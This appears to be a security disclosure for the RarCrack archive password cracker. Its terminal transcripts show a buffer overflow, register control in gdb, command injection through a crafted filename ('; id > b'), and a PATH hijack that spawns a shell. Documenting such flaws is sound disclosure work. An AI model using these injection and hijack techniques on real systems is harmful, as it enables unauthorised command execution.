RarCrack! is a simple brute-force password cracker for archives. It follows several bad practices that can cause security problems, e.g. when it is embedded in or invoked by other programs. The transcripts below show, in order: an over-long command-line argument triggering a fortify-detected buffer overflow; an over-long `--type` value crashing the program with register contents filled from the argument; a filename that appears to be handed unescaped to a shell-invoked `file` command, so that a command embedded in the name is executed; and `file` being resolved through the caller's PATH rather than an absolute path.
$ /usr/bin/rarcrack $(python3 -c 'print("A"*500)')
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)
*** buffer overflow detected ***: /usr/bin/rarcrack terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bfb)[0x7faa1c861bfb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7faa1c8ea1f7]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7330)[0x7faa1c8e8330]
/lib/x86_64-linux-gnu/libc.so.6(+0xf6692)[0x7faa1c8e7692]
/usr/bin/rarcrack(+0x2477)[0x55565707e477]
/usr/bin/rarcrack(+0x1481)[0x55565707d481]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7faa1c8112e1]
/usr/bin/rarcrack(+0x14fa)[0x55565707d4fa]
...
$ gdb -ex=r --args /usr/bin/rarcrack --type $(python3 -c 'print("A"*400)')
...
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)
WARNING: invalid parameter --type AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
ERROR: The specified file () is not exists or
you don't have a right permissions!
Program received signal SIGSEGV, Segmentation fault.
0x000055555555644d in ?? ()
(gdb) i r
rax 0x2b 43
rbx 0x4141414141414141 4702111234474983745
rcx 0x7ffff753d730 140737342854960
rdx 0x7ffff77fd760 140737345738592
rsi 0x55555576ac20 93824994421792
rdi 0x0 0
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe3a8 0x7fffffffe3a8
r8 0x7ffff7fccd00 140737353927936
r9 0x2f 47
r10 0x73 115
r11 0x246 582
r12 0x4141414141414141 4702111234474983745
r13 0x4141414141414141 4702111234474983745
r14 0x4141414141414141 4702111234474983745
r15 0x4141414141414141 4702111234474983745
rip 0x55555555644d 0x55555555644d
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
$ export c='; id > b' && touch "$c" && /usr/bin/rarcrack "$c" && cat b
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)
Usage: file [-bcEhikLlNnprsvzZ0] [--apple] [--extension] [--mime-encoding] [--mime-type]
[-e testname] [-F separator] [-f namefile] [-m magicfiles] file ...
file -C [-m magicfiles]
file [--help]
INFO: detected file type:
ERROR: Couldn't detect archive type
uid=1002(pwn) gid=1002(pwn) groups=1002(pwn)
$ echo -e '#!/bin/sh\n/bin/sh 1>&2' > file && chmod +x file && PATH=$(pwd) /usr/bin/rarcrack /usr/bin/rarcrack
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)
$ /usr/bin/id
uid=1002(pwn) gid=1002(pwn) groups=1002(pwn)